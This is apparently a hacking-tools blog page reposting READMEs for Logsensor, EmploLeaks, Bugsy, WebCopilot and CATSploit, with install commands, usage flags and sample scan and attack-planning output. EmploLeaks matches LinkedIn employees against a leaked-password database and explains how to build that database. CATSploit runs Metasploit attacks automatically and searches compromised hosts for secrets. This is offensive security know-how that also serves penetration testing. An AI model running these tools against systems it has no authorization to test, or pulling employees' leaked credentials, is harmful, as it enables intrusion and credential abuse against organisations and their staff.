Security of Information, Threat Intelligence, Hacking, Offensive Security, Pentest, Open Source, Hackers Tools, Leaks, Pr1v8, Premium Courses Free, etc

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  • Friendly OS designed for Pentesting - ParrotOS

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Sunday, February 18, 2024

Logsensor - A Powerful Sensor Tool To Discover Login Panels, And POST Form SQLi Scanning


A Powerful Sensor Tool to discover login panels, and POST Form SQLi Scanning

Features

  • login panel Scanning for multiple hosts
  • Proxy compatibility (http, https)
  • Login panel scanning are done in multiprocessing

so the script is super fast at scanning many urls

quick tutorial & screenshots are shown at the bottom
project contribution tips at the bottom

Installation

git clone https://github.com/Mr-Robert0/Logsensor.git
cd Logsensor && sudo chmod +x logsensor.py install.sh
pip install -r requirements.txt
./install.sh

Dependencies

Quick Tutorial

1. Multiple hosts scanning to detect login panels

  • You can increase the threads (default 30)
  • only run login detector module
python3 logsensor.py -f <subdomains-list> 
python3 logsensor.py -f <subdomains-list> -t 50
python3 logsensor.py -f <subdomains-list> --login

2. Targeted SQLi form scanning

  • can provide only specifc url of login panel with --sqli or -s flag for run only SQLi form scanning Module
  • turn on the proxy to see the requests
  • customize user input name of login panel with actual name (default "username")
python logsensor.py -u www.example.com/login --sqli 
python logsensor.py -u www.example.com/login -s --proxy http://127.0.0.1:8080
python logsensor.py -u www.example.com/login -s --inputname email

View help

Login panel Detector Module -s, --sqli run only POST Form SQLi Scanning Module with provided Login panels Urls -n , --inputname Customize actual username input for SQLi scan (e.g. 'username' or 'email') -t , --threads Number of threads (default 30) -h, --help Show this help message and exit " dir="auto">
python logsensor.py --help

usage: logsensor.py [-h --help] [--file ] [--url ] [--proxy] [--login] [--sqli] [--threads]

optional arguments:
-u , --url Target URL (e.g. http://example.com/ )
-f , --file Select a target hosts list file (e.g. list.txt )
--proxy Proxy (e.g. http://127.0.0.1:8080)
-l, --login run only Login panel Detector Module
-s, --sqli run only POST Form SQLi Scanning Module with provided Login panels Urls
-n , --inputname Customize actual username input for SQLi scan (e.g. 'username' or 'email')
-t , --threads Number of threads (default 30)
-h, --help Show this help message and exit

Screenshots


Development

TODO

  1. adding "POST form SQli (Time based) scanning" and check for delay
  2. Fuzzing on Url Paths So as not to miss any login panel


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EmploLeaks - An OSINT Tool That Helps Detect Members Of A Company With Leaked Credentials

 

This is a tool designed for Open Source Intelligence (OSINT) purposes, which helps to gather information about employees of a company.

How it Works

The tool starts by searching through LinkedIn to obtain a list of employees of the company. Then, it looks for their social network profiles to find their personal email addresses. Finally, it uses those email addresses to search through a custom COMB database to retrieve leaked passwords. You an easily add yours and connect to through the tool.

Installation

To use this tool, you'll need to have Python 3.10 installed on your machine. Clone this repository to your local machine and install the required dependencies using pip in the cli folder:

cd cli
pip install -r requirements.txt

OSX

We know that there is a problem when installing the tool due to the psycopg2 binary. If you run into this problem, you can solve it running:

cd cli
python3 -m pip install psycopg2-binary`

Basic Usage

To use the tool, simply run the following command:

python3 cli/emploleaks.py

If everything went well during the installation, you will be able to start using EmploLeaks:

___________              .__         .__                 __
\_ _____/ _____ ______ | | ____ | | ____ _____ | | __ ______
| __)_ / \____ \| | / _ \| | _/ __ \__ \ | |/ / / ___/
| \ Y Y \ |_> > |_( <_> ) |_\ ___/ / __ \| < \___ \
/_______ /__|_| / __/|____/\____/|____/\___ >____ /__|_ \/____ >
\/ \/|__| \/ \/ \/ \/

OSINT tool ðŸ•Âµ to chain multiple apis
emploleaks>

Right now, the tool supports two functionalities:

  • Linkedin, for searching all employees from a company and get their personal emails.
    • A GitLab extension, which is capable of finding personal code repositories from the employees.
  • If defined and connected, when the tool is gathering employees profiles, a search to a COMB database will be made in order to retrieve leaked passwords.

Retrieving Linkedin Profiles

First, you must set the plugin to use, which in this case is linkedin. After, you should set your authentication tokens and the run the impersonate process:

emploleaks> use --plugin linkedin
emploleaks(linkedin)> setopt JSESSIONID
JSESSIONID:
[+] Updating value successfull
emploleaks(linkedin)> setopt li-at
li-at:
[+] Updating value successfull
emploleaks(linkedin)> show options
Module options:

Name Current Setting Required Description
---------- ----------------------------------- ---------- -----------------------------------
hide yes no hide the JSESSIONID field
JSESSIONID ************************** no active cookie session in browser #1
li-at AQEDAQ74B0YEUS-_AAABilIFFBsAAAGKdhG no active cookie session in browser #1
YG00AxGP34jz1bRrgAcxkXm9RPNeYIAXz3M
cycrQm5FB6lJ-Tezn8GGAsnl_GRpEANRdPI
lWTRJJGF9vbv5yZHKOeze_WCHoOpe4ylvET
kyCyfN58SNNH
emploleaks(linkedin)> run i mpersonate
[+] Using cookies from the browser
Setting for first time JSESSIONID
Setting for first time li_at

li_at and JSESSIONID are the authentication cookies of your LinkedIn session on the browser. You can use the Web Developer Tools to get it, just sign-in normally at LinkedIn and press right click and Inspect, those cookies will be in the Storage tab.

Now that the module is configured, you can run it and start gathering information from the company:

Get Linkedin accounts + Leaked Passwords

We created a custom workflow, where with the information retrieved by Linkedin, we try to match employees' personal emails to potential leaked passwords. In this case, you can connect to a database (in our case we have a custom indexed COMB database) using the connect command, as it is shown below:

emploleaks(linkedin)> connect --user myuser --passwd mypass123 --dbname mydbname --host 1.2.3.4
[+] Connecting to the Leak Database...
[*] version: PostgreSQL 12.15

Once it's connected, you can run the workflow. With all the users gathered, the tool will try to search in the database if a leaked credential is affecting someone:

As a conclusion, the tool will generate a console output with the following information:
  • A list of employees of the company (obtained from LinkedIn)
  • The social network profiles associated with each employee (obtained from email address)
  • A list of leaked passwords associated with each email address.

How to build the indexed COMB database

An imortant aspect of this project is the use of the indexed COMB database, to build your version you need to download the torrent first. Be careful, because the files and the indexed version downloaded requires, at least, 400 GB of disk space available.

Once the torrent has been completelly downloaded you will get a file folder as following:

â”ω”€Ã¢”€ count_total.sh
â”ω”€Ã¢”€ data
│ â”ω”€Ã¢”€ 0
│ â”ω”€Ã¢”€ 1
│ │ â”ω”€Ã¢”€ 0
│ │ â”ω”€Ã¢”€ 1
│ │ â”ω”€Ã¢”€ 2
│ │ â”ω”€Ã¢”€ 3
│ │ â”ω”€Ã¢”€ 4
│ │ â”ω”€Ã¢&€ 5
│ │ â”ω”€Ã¢”€ 6
│ │ â”ω”€Ã¢”€ 7
│ │ â”ω”€Ã¢”€ 8
│ │ â”ω”€Ã¢”€ 9
│ │ â”ω”€Ã¢”€ a
│ │ â”ω”€Ã¢”€ b
│ │ â”ω”€Ã¢”€ c
│ │ â”ω”€Ã¢”€ d
│ │ â”ω”€Ã¢”€ e
│ │ â”ω”€Ã¢”€ f
│ │ â”ω”€Ã¢”€ g
│ │ â”ω”€Ã¢”€ h
│ │ â”ω”€Ã¢”€ i
│ │ â”ω”€Ã¢”€ j
│ │ â”ω”€Ã¢”€ k
│ │ â”ω”€Ã¢”€ l
│ │ â”ω”€Ã¢”€ m
│ │ â”ω €Ã¢”€ n
│ │ â”ω”€Ã¢”€ o
│ │ â”ω”€Ã¢”€ p
│ │ â”ω”€Ã¢”€ q
│ │ â”ω”€Ã¢”€ r
│ │ â”ω”€Ã¢”€ s
│ │ â”ω”€Ã¢”€ symbols
│ │ â”ω”€Ã¢”€ t

At this point, you could import all those files with the command create_db:

The importer takes a lot of time for that reason we recommend to run it with patience.

Next Steps

We are integrating other public sites and applications that may offer about a leaked credential. We may not be able to see the plaintext password, but it will give an insight if the user has any compromised credential:

  • Integration with Have I Been Pwned?
  • Integration with Firefox Monitor
  • Integration with Leak Check
  • Integration with BreachAlarm

Also, we will be focusing on gathering even more information from public sources of every employee. Do you have any idea in mind? Don't hesitate to reach us:

Or you con DM at @pastacls or @gaaabifranco on Twitter.




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Bugsy - Command-line Interface Tool That Provides Automatic Security Vulnerability Remediation For Your Code


Bugsy is a command-line interface (CLI) tool that provides automatic security vulnerability remediation for your code. It is the community edition version of Mobb, the first vendor-agnostic automated security vulnerability remediation tool. Bugsy is designed to help developers quickly identify and fix security vulnerabilities in their code.


What is Mobb?

Mobb is the first vendor-agnostic automatic security vulnerability remediation tool. It ingests SAST results from Checkmarx, CodeQL (GitHub Advanced Security), OpenText Fortify, and Snyk and produces code fixes for developers to review and commit to their code.

What does Bugsy do?

Bugsy has two modes - Scan (no SAST report needed) & Analyze (the user needs to provide a pre-generated SAST report from one of the supported SAST tools).

Scan

  • Uses Checkmarx or Snyk CLI tools to run a SAST scan on a given open-source GitHub/GitLab repo
  • Analyzes the vulnerability report to identify issues that can be remediated automatically
  • Produces the code fixes and redirects the user to the fix report page on the Mobb platform

Analyze

  • Analyzes the a Checkmarx/CodeQL/Fortify/Snyk vulnerability report to identify issues that can be remediated automatically
  • Produces the code fixes and redirects the user to the fix report page on the Mobb platform

Disclaimer

This is a community edition version that only analyzes public GitHub repositories. Analyzing private repositories is allowed for a limited amount of time. Bugsy does not detect any vulnerabilities in your code, it uses findings detected by the SAST tools mentioned above.

Usage

You can simply run Bugsy from the command line, using npx:

npx mobbdev



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WebCopilot - An Automation Tool That Enumerates Subdomains Then Filters Out Xss, Sqli, Open Redirect, Lfi, Ssrf And Rce Parameters And Then Scans For Vulnerabilities


WebCopilot is an automation tool designed to enumerate subdomains of the target and detect bugs using different open-source tools.

The script first enumerate all the subdomains of the given target domain using assetfinder, sublister, subfinder, amass, findomain, hackertarget, riddler and crt then do active subdomain enumeration using gobuster from SecLists wordlist then filters out all the live subdomains using dnsx then it extract titles of the subdomains using httpx & scans for subdomain takeover using subjack. Then it uses gauplus & waybackurls to crawl all the endpoints of the given subdomains then it use gf patterns to filters out xss, lfi, ssrf, sqli, open redirect & rce parameters from that given subdomains, and then it scans for vulnerabilities on the sub domains using different open-source tools (like kxss, dalfox, openredirex, nuclei, etc). Then it'll print out the result of the scan and save all the output in a specified directory.


Features

Usage

g!2m0:~ webcopilot -h
             
──────▄▀▄─────▄▀▄
─────▄█░░▀▀▀▀▀░░█▄
─▄▄──█░░░░░░░░░░░█──▄▄
█▄▄█─█░░▀░░┬░░▀░░█─█▄▄█
██╗░░░░░░░██╗███████╗██████╗░░█████╗░░█████╗░██████╗░██╗██╗░░░░░░█████╗░████████╗
░██║░░██╗░░██║██╔════╝██╔══██╗██╔══██╗██╔══██╗██╔══██╗██║██║░░░░░██╔══██╗╚══██╔══╝
░╚██╗████╗██╔╝█████╗░░██████╦╝██║░░╚═╝██║░░██║██████╔╝██║██║░░░░░██║░░██║░░░██║░░░
░░████╔═████║░██╔══╝░░██╔══██╗██║░░██╗██║░░██║██╔═══╝░██║██║ ░░░░██║░░██║░░░██║░░░
░░╚██╔╝░╚██╔╝░███████╗██████╦╝╚█████╔╝╚█████╔╝██║░░░░░██║███████╗╚█████╔╝░░░██║░░░
░░░╚═╝░░░╚═╝░░╚══════╝╚═════╝░░╚════╝ ░╚════╝░╚═╝░░░░░╚═╝╚══════╝░╚════╝░░░░╚═╝░░░
[●] @h4r5h1t.hrs | G!2m0

Usage:
webcopilot -d <target>
webcopilot -d <target> -s
webcopilot [-d target] [-o output destination] [-t threads] [-b blind server URL] [-x exclude domains]

Flags:
-d Add your target [Requried]
-o To save outputs in folder [Default: domain.com]
-t Number of threads [Default: 100]
-b Add your server for BXSS [Default: False]
-x Exclude out of scope domains [Default: False]
-s Run only Subdomain Enumeration [Default: False]
-h Show this help message

Example: webcopilot -d domain.com -o domain -t 333 -x exclude.txt -b testServer.xss
Use https://xsshunter.com/ or https://interact.projectdiscovery.io/ to get your server

Installing WebCopilot

WebCopilot requires git to install successfully. Run the following command as a root to install webcopilot

git clone https://github.com/h4r5h1t/webcopilot && cd webcopilot/ && chmod +x webcopilot install.sh && mv webcopilot /usr/bin/ && ./install.sh

Tools Used:

SubFinderSublist3rFindomaingfOpenRedireXdnsxsqlmapgobusterassetfinderhttpxkxssqsreplaceNucleidalfoxanewjqaquatoneurldedupeAmassgaupluswaybackurlscrlfuzz

Running WebCopilot

To run the tool on a target, just use the following command.

g!2m0:~ webcopilot -d bugcrowd.com

The -o command can be used to specify an output dir.

g!2m0:~ webcopilot -d bugcrowd.com -o bugcrowd

The -s command can be used for only subdomain enumerations (Active + Passive and also get title & screenshots).

g!2m0:~ webcopilot -d bugcrowd.com -o bugcrowd -s 

The -t command can be used to add thrads to your scan for faster result.

g!2m0:~ webcopilot -d bugcrowd.com -o bugcrowd -t 333 

The -b command can be used for blind xss (OOB), you can get your server from xsshunter or interact

g!2m0:~ webcopilot -d bugcrowd.com -o bugcrowd -t 333 -b testServer.xss

The -x command can be used to exclude out of scope domains.

g!2m0:~ echo out.bugcrowd.com > excludeDomain.txt
g!2m0:~ webcopilot -d bugcrowd.com -o bugcrowd -t 333 -x excludeDomain.txt -b testServer.xss

Example

Default options looks like this:

g!2m0:~ webcopilot -d bugcrowd.com - bugcrowd
                                ──────▄▀▄─────▄▀▄
─────▄█░░▀▀▀▀▀░░█▄
─▄▄──█░░░░░░░░░░░█──▄▄
█▄▄█─█░░▀░░┬░░▀░░█─█▄▄█
██╗░░░░░░░██╗███████╗██████╗░░█████╗░ █████╗░██████╗░██╗██╗░░░░░░█████╗░████████╗
░██║░░██╗░░██║██╔════╝██╔══██╗██╔══██╗██╔══██╗██╔══██╗██║██║░░░░░██╔══██╗╚══██╔══╝
░╚██╗████╗██╔╝█ ███╗░░██████╦╝██║░░╚═╝██║░░██║██████╔╝██║██║░░░░░██║░░██║░░░██║░░░
░░████╔═████║░██╔══╝░░██╔══██╗██║░░██╗██║░░██║██╔═══╝░██║██║░░░░░██║░░██║░░ ██║░░░
░░╚██╔╝░╚██╔╝░███████╗██████╦╝╚█████╔╝╚█████╔╝██║░░░░░██║███████╗╚█████╔╝░░░██║░░░
░░░╚═╝░░░╚═╝░░╚══════╝╚═════╝░░╚════╝░░╚════╝░╚═╝░░░ ░╚═╝╚══════╝░╚════╝░░░░╚═╝░░░
[●] @h4r5h1t.hrs | G!2m0


[❌] Warning: Use with caution. You are responsible for your own actions.
[❌] Developers assume no liability and are not responsible for any misuse or damage cause by this tool.


Target: bugcrowd.com
Output: /home/gizmo/targets/bugcrowd
Threads: 100
Server: False
Exclude: False
Mode: Running all Enumeration
Time: 30-08-2021 15:10:00

[!] Please wait while scanning...

[●] Subdoamin Scanning is in progress: Scanning subdomains of bugcrowd.com
[●] Subdoamin Scanned - [assetfinder✔] Subdomain Found: 34
[●] Subdoamin Scanned - [sublist3r✔] Subdomain Found: 29
[●] Subdoamin Scanned - [subfinder✔] Subdomain Found: 54
[●] Subdoamin Scanned - [amass✔] Subdomain Found: 43
[●] Subdoamin Scanned - [findomain✔] Subdomain Found: 27

[●] Active Subdoamin Scanning is in progress:
[!] Please be patient. This may take a while...
[●] Active Subdoamin Scanned - [gobuster✔] Subdomain Found: 11
[●] Active Subdoamin Scanned - [amass✔] Subdomain Found: 0

[●] Subdomain Scanning: Filtering out of scope subdomains
[●] Subdomain Scanning: Filtering Alive subdomains
[●] Subdomain Scanning: Getting titles of valid subdomains
[●] Visual inspection of Subdoamins is completed. Check: /subdomains/aquatone/

[●] Scanning Completed for Subdomains of bugcrowd.com Total: 43 | Alive: 30

[●] Endpoints Scanning Completed for Subdomains of bugcrowd.com Total: 11032
[●] Vulnerabilities Scanning is in progress: Getting all vulnerabilities of bugcrowd.com
[●] Vulnerabilities Scanned - [XSS✔] Found: 0
[●] Vulnerabilities Scanned - [SQLi✔] Found: 0
[●] Vulnerabilities Scanned - [LFI✔] Found: 0
[●] Vulnerabilities Scanned - [CRLF✔] Found: 0
[●] Vulnerabilities Scanned - [SSRF✔] Found: 0
[●] Vulnerabilities Scanned - [Sensitive Data✔] Found: 0
[●] Vulnerabilities Scanned - [Open redirect✔] Found: 0
[●] Vulnerabilities Scanned - [Subdomain Takeover✔] Found: 0
[●] Vulnerabilities Scanned - [Nuclie✔] Found: 0
[●] Vulnerabilities Scanning Completed for Subdomains of bugcrowd.com Check: /vulnerabilities/


▒█▀▀█ █▀▀ █▀▀ █░░█ █░░ ▀▀█▀▀
▒█▄▄▀ █▀▀ ▀▀█ █░░█ █░░ ░░█░░
▒█░▒█ ▀▀▀ ▀▀▀ ░▀▀▀ ▀▀▀ ░░▀░░

[+] Subdomains of bugcrowd.com
[+] Subdomains Found: 0
[+] Subdomains Alive: 0
[+] Endpoints: 11032
[+] XSS: 0
[+] SQLi: 0
[+] Open Redirect: 0
[+] SSRF: 0
[+] CRLF: 0
[+] LFI: 0
[+] Sensitive Data: 0
[+] Subdomain Takeover: 0
[+] Nuclei: 0

Acknowledgement

WebCopilot is inspired from Garud & Pinaak by ROX4R.



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CATSploit - An Automated Penetration Testing Tool Using Cyber Attack Techniques Scoring


CATSploit is an automated penetration testing tool using Cyber Attack Techniques Scoring (CATS) method that can be used without pentester. Currently, pentesters implicitly made the selection of suitable attack techniques for target systems to be attacked. CATSploit uses system configuration information such as OS, open ports, software version collected by scanner and calculates a score value for capture eVc and detectability eVd of each attack techniques for target system. By selecting the highest score values, it is possible to select the most appropriate attack technique for the target system without hack knack(professional pentester’s skill) .

CATSploit automatically performs penetration tests in the following sequence:

  1. Information gathering and prior information input First, gathering information of target systems. CATSploit supports nmap and OpenVAS to gather information of target systems. CATSploit also supports prior information of target systems if you have.

  2. Calculating score value of attack techniques Using information obtained in the previous phase and attack techniques database, evaluation values of capture (eVc) and detectability (eVd) of each attack techniques are calculated. For each target computer, the values of each attack technique are calculated.

  3. Selection of attack techniques by using scores and make attack scenario Select attack techniques and create attack scenarios according to pre-defined policies. For example, for a policy that prioritized hard-to-detect, the attack techniques with the lowest eVd(Detectable Score) will be selected.

  4. Execution of attack scenario CATSploit executes the attack techniques according to attack scenario constructed in the previous phase. CATSploit uses Metasploit as a framework and Metasploit API to execute actual attacks.


Prerequisities

CATSploit has the following prerequisites:

  • Kali Linux 2023.2a

Installation

For Metasploit, Nmap and OpenVAS, it is assumed to be installed with the Kali Distribution.

Installing CATSploit

To install the latest version of CATSploit, please use the following commands:

Cloneing and setup
$ git clone https://github.com/catsploit/catsploit.git
$ cd catsploit
$ git clone https://github.com/catsploit/cats-helper.git
$ sudo ./setup.sh

Editing configuration file

CATSploit is a server-client configuration, and the server reads the configuration JSON file at startup. In config.json, the following fields should be modified for your environment.

  • DBMS
    • dbname: database name created for CATSploit
    • user: username of PostgreSQL
    • password: password of PostgrSQL
    • host: If you are using a database on a remote host, specify the IP address of the host
  • SCENARIO
    • generator.maxscenarios: Maximum number of scenarios to calculate (*)
  • ATTACKPF
    • msfpassword: password of MSFRPCD
    • openvas.user: username of PostgreSQL
    • openvas.password: password of PostgreSQL
    • openvas.maxhosts: Maximum number of hosts to be test at the same time (*)
    • openvas.maxchecks: Maximum number of test items to be test at the same time (*)
  • ATTACKDB
    • attack_db_dir: Path to the folder where AtackSteps are stored

(*) Adjust the number according to the specs of your machine.

Usage

To start the server, execute the following command:

$ python cats_server.py -c [CONFIG_FILE]

Next, prepare another console, start the client program, and initiate a connection to the server.

$ python catsploit.py -s [SOCKET_PATH]

After successfully connecting to the server and initializing it, the session will start.

   _________  ___________       __      _ __
/ ____/ |/_ __/ ___/____ / /___ (_) /_
/ / / /| | / / \__ \/ __ \/ / __ \/ / __/
/ /___/ ___ |/ / ___/ / /_/ / / /_/ / / /_
\____/_/ |_/_/ /____/ .___/_/\____/_/\__/
/_/

[*] Connecting to cats-server
[*] Done.
[*] Initializing server
[*] Done.
catsploit>

The client can execute a variety of commands. Each command can be executed with -h option to display the format of its arguments.

usage: [-h] {host,scenario,scan,plan,attack,post,reset,help,exit} ...

positional arguments:
{host,scenario,scan,plan,attack,post,reset,help,exit}

options:
-h, --help show this help message and exit

I've posted the commands and options below as well for reference.

host list:
show information about the hosts
usage: host list [-h]
options:
-h, --help show this help message and exit

host detail:
show more information about one host
usage: host detail [-h] host_id
positional arguments:
host_id ID of the host for which you want to show information
options:
-h, --help show this help message and exit

scenario list:
show information about the scenarios
usage: scenario list [-h]
options:
-h, --help show this help message and exit

scenario detail:
show more information about one scenario
usage: scenario detail [-h] scenario_id
positional arguments:
scenario_id ID of the scenario for which you want to show information
options:
-h, --help show this help message and exit

scan:
run network-scan and security-scan
usage: scan [-h] [--port PORT] targe t_host [target_host ...]
positional arguments:
target_host IP address to be scanned
options:
-h, --help show this help message and exit
--port PORT ports to be scanned

plan:
planning attack scenarios
usage: plan [-h] src_host_id dst_host_id
positional arguments:
src_host_id originating host
dst_host_id target host
options:
-h, --help show this help message and exit

attack:
execute attack scenario
usage: attack [-h] scenario_id
positional arguments:
scenario_id ID of the scenario you want to execute

options:
-h, --help show this help message and exit

post find-secret:
find confidential information files that can be performed on the pwned host
usage: post find-secret [-h] host_id
positional arguments:
host_id ID of the host for which you want to find confidential information
op tions:
-h, --help show this help message and exit

reset:
reset data on the server
usage: reset [-h] {system} ...
positional arguments:
{system} reset system
options:
-h, --help show this help message and exit

exit:
exit CATSploit
usage: exit [-h]
options:
-h, --help show this help message and exit

Examples

In this example, we use CATSploit to scan network, plan the attack scenario, and execute the attack.

catsploit> scan 192.168.0.0/24
Network Scanning ... 100%
[*] Total 2 hosts were discovered.
Vulnerability Scanning ... 100%
[*] Total 14 vulnerabilities were discovered.
catsploit> host list
┏━━━━━━━━━━┳━━━━━━━━━━━━━━━━┳━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┳━━━━━━━┓
┃ hostID ┃ IP ┃ Hostname ┃ Platform ┃ Pwned ┃
┡━━━━━━ ━━━╇━━━━━━━━━━━━━━━━╇━━━━━━━━━━╇━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━╇━━━━━━━┩
│ attacker │ 0.0.0.0 │ kali │ kali 2022.4 │ True │
│ h_exbiy6 │ 192.168.0.10 │ │ Linux 3.10 - 4.11 │ False │
│ h_nhqyfq │ 192.168.0.20 │ │ Microsoft Windows 7 SP1 │ False │
└──────────┴ ───────────────┴──────────┴──────────────────────────────────┴───────┘


catsploit> host detail h_exbiy6
┏━━━━━━━━━━┳━━━━━━━━━━━━━━┳━━━━━━━━━━┳━━━━━━━━━━━━━━┳━━━━━━━┓
┃ hostID ┃ IP ┃ Hostname ┃ Platform ┃ Pwned ┃
┡━━━━━━━━━━╇━━━━━━━━━━━━━━╇━━━━━━━━━━╇━━━━━━━━━━━━━━╇━━━━━━━┩
│ h_exbiy6 │ 192.168.0.10 │ ubuntu │ ubuntu 14.04 │ False │
└──────────┴──────────────┴──────────┴──────────────┴─ ─────┘

[IP address]
┏━━━━━━━━━━━━━━┳━━━━━━━━━━┳━━━━━━┳━━━━━━━━━━━━┓
┃ ipv4 ┃ ipv4mask ┃ ipv6 ┃ ipv6prefix ┃
┡━━━━━━━━━━━━━━╇━━━━━━━━━━╇━━━━━━╇━━━━━━━━━━━━┩
│ 192.168.0.10 │ │ │ │
└──────────── ─┴──────────┴──────┴────────────┘

[Open ports]
┏━━━━━━━━━━━━━━┳━━━━━━━┳━━━━━━┳━━━━━━━━━━━━━┳━━━━━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━┓
┃ ip ┃ proto ┃ port ┃ service ┃ product ┃ version ┃
┡━━━━━━━━━━━━━━╇━━━━━━━╇━━━━━━╇━━━━━━━━━━━━━╇━━━━━━━━━━━━━━╇━━━━━━━━━━━━━━━━━━━━━━━━━━━━┩
│ 192.168.0.10 │ tcp │ 21 │ ftp │ ProFTPD │ 1.3.5 │
│ 192.168.0.10 │ tcp │ 22 │ ssh │ OpenSSH │ 6.6.1p1 Ubuntu 2ubuntu2.10 │
│ 192.168.0.10 │ tcp │ 80 │ http │ Apache httpd │ 2.4.7 │
│ 192.168.0.10 │ tcp │ 445 │ netbios-ssn │ Samba smbd │ 3.X - 4.X │
│ 192.168.0.10 │ tcp │ 631 │ ipp │ CUPS │ 1.7 │
└──────────────┴───────┴──────┴─────────────┴──────────────┴────────────────────────────┘

[Vulnerabilities]
┏━━━━━━━━━━━━━━┳━━━━━━━┳━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┳━━━━━━━━━━━━━━━━┓
┃ ip ┃ proto ┃ port ┃ vuln_name ┃ cve ┃
┡━━━━━━━━━━━━━━╇━━━━━━━╇━━━━━━╇━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━╇━━━━━━━━━━━━━━━━┩
│ 192.168.0.10 │ tcp │ 0 │ TCP Timestamps Information Disclosure │ N/A │
│ 192.168.0.10 │ tcp │ 21 │ FTP Unencrypted Cleartext Login │ N/A │
│ 192.168.0.10 │ tcp │ 22 │ Weak MAC Algorithm(s) Supported (SSH) │ N/A │
│ 192.168.0.10 │ tcp │ 22 │ Weak Encryption Algorithm(s) Supported (SSH) │ N/A │
│ 192.168.0.10 │ tcp │ 22 │ Weak Host Key Algorithm(s) (SSH) │ N/A │
│ 192.168.0.10 │ tcp │ 22 │ Weak Key Exchange (KEX) Algorithm(s) Supported (SSH) │ N/A │
│ 192.168.0.10 │ tcp │ 80 │ Test HTTP dangerous methods │ N/A │
│ 192.168.0.10 │ tcp │ 80 │ Drupal Core SQLi Vulnerability (SA-CORE-2014-005) - Active Check │ CVE-2014-3704 │
│ 192.168.0.10 │ tcp │ 80 │ Drupal Coder RCE Vulnerability (SA-CONTRIB-2016-039) - Active Check │ N/A │
│ 192.168.0.10 │ tcp │ 80 │ Sensitive File Disclosure (HTTP) │ N/A │
│ 192.168.0.10 │ tcp │ 80 │ Unprotected Web App / Device Installers (HTTP) │ N/A │
│ 192.168.0.10 │ tcp │ 80 │ Cleartext Transmission of Sensitive Information via HTTP │ N/A │
│ 192.168.0.10 │ tcp │ 80 │ jQuery < 1.9.0 XSS Vulnerability │ CVE-2012-6708 │
│ 192.168.0.10 │ tcp │ 80 │ jQuery < 1.6.3 XSS Vulnerability │ CVE-2011-4969 │
│ 192.168.0.10 │ tcp │ 80 │ Drupal 7.0 Information Disclosure Vulnerability - Active Check │ CVE-2011-3730 │
│ 192.168.0.10 │ tcp │ 631 │ SSL/TLS: Report Vulnerable Cipher Suites for HTTPS │ CVE-2016-2183 │
│ 192.168.0.10 │ tcp │ 631 │ SSL/TLS: Report Vulnerable Cipher Suites for HTTPS │ CVE-2016-6329 │
│ 192.168.0.10 │ tcp │ 631 │ SSL/TLS: Report Vulnerable Cipher Suites for HTTPS │ CVE-2020-12872 │
│ 192.168.0.10 │ tcp │ 631 │ SSL/TLS: Deprecated TLSv1.0 and TLSv1.1 Protocol Detection │ CVE-2011-3389 │
│ 192.168.0.10 │ tcp │ 631 │ SSL/TLS: Deprecated TLSv1.0 and TLSv1.1 Protocol Detection │ CVE-2015-0204 │
└──────────────┴───────┴──────┴─────────────────────────────────────────────────────────────────────┴───& #9472;────────────┘

[Users]
┏━━━━━━━━━━━┳━━━━━━━┓
┃ user name ┃ group ┃
┡━━━━━━━━━━━╇━━━━━━━┩
└───────────┴───────┘


catsploit> plan attacker h_exbiy6
Planning attack scenario...100%
[*] Done. 15 scenarios was planned.
[*] To check each scenario, try 'scenario list' and/or 'scenario detail'.
catsploit> scenario list
┏━━━━━━━━━━━━━┳━━━━━ ━━━━━━━┳━━━━━━━━━━━━━━━━┳━━━━━━━┳━━━━━━━┳━━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┓
┃ scenario id ┃ src host ip ┃ target host ip ┃ eVc ┃ eVd ┃ steps ┃ first attack step ┃
┡━━━━━━━━━━━━━╇━━━━━━━━━━━━━╇━━━━━━━━&#947 3;━━━━━━━╇━━━━━━━╇━━━━━━━╇━━━━━━━╇━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┩
│ 3d3ivc │ 0.0.0.0 │ 192.168.0.10 │ 1.0 │ 32.0 │ 1 │ exploit/multi/http/jenkins_s… │
│ 5gnsvh │ 0.0.0.0 │ 192.168.0.10 │ 1.0 │ 53.76 │ 2 │ exploit/multi/http/jenkins_s… │
│ 6nlxyc │ 0.0.0.0 │ 192.168.0.10 │ 0.0 │ 48.32 │ 2 │ exploit/multi/http/jenkins_s… │
│ 8jos4z │ 0.0.0.0 │ 192.168.0.1 0 │ 0.7 │ 72.8 │ 2 │ exploit/multi/http/jenkins_s… │
│ 8kmmts │ 0.0.0.0 │ 192.168.0.10 │ 0.0 │ 32.0 │ 1 │ exploit/multi/elasticsearch/… │
│ agjmma │ 0.0.0.0 │ 192.168.0.10 │ 0.0 │ 24.0 │ 1 │ exploit/windows/http/managee… │
│ joglhf │ 0.0.0.0 │ 192.168.0.10 │ 70.0 │ 60.0 │ 1 │ auxiliary/scanner/ssh/ssh_lo… │
│ rmgrof │ 0.0.0.0 │ 192.168.0.10 │ 100.0 │ 32.0 │ 1 │ exploit/multi/http/drupal_dr… │
│ xuowzk │ 0.0.0.0 │ 192.168.0.10 │ 0.0 │ 24.0 │ 1 │ exploit/multi/http/struts_dm… │
│ yttv51 │ 0.0.0.0 │ 192.168.0.10 │ 0.01 │ 53.76 │ 2 │ exploit/multi/http/jenkins_s… │
│ znv76x │ 0.0.0.0 │ 192.168.0.10 │ 0.01 │ 53.76 │ 2 │ exploit/multi/http/jenkins_s… │
└─────────────┴─────────────┴────────────────┴───────┴───────┴───────┴───────────────────────────────┘

catsploit> scenario detail rmgrof
┏━━━━━━━━━━━━━┳━━━━━━━━━━━━━━━━┳━━━━━━━┳━━━━━━┓
┃ src host ip ┃ target host ip ┃ eVc ┃ eVd ┃
┡━━━━━━━━━━━━━╇━━━━━━━━━━━━━━━━╇━━━━━━━╇━━━━━━┩
│ 0.0.0.0 │ 192.168.0.10 │ 100.0 │ 32.0 │
└─────────────┴──────── ───────┴───────┴──────┘

[Steps]
┏━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━┓
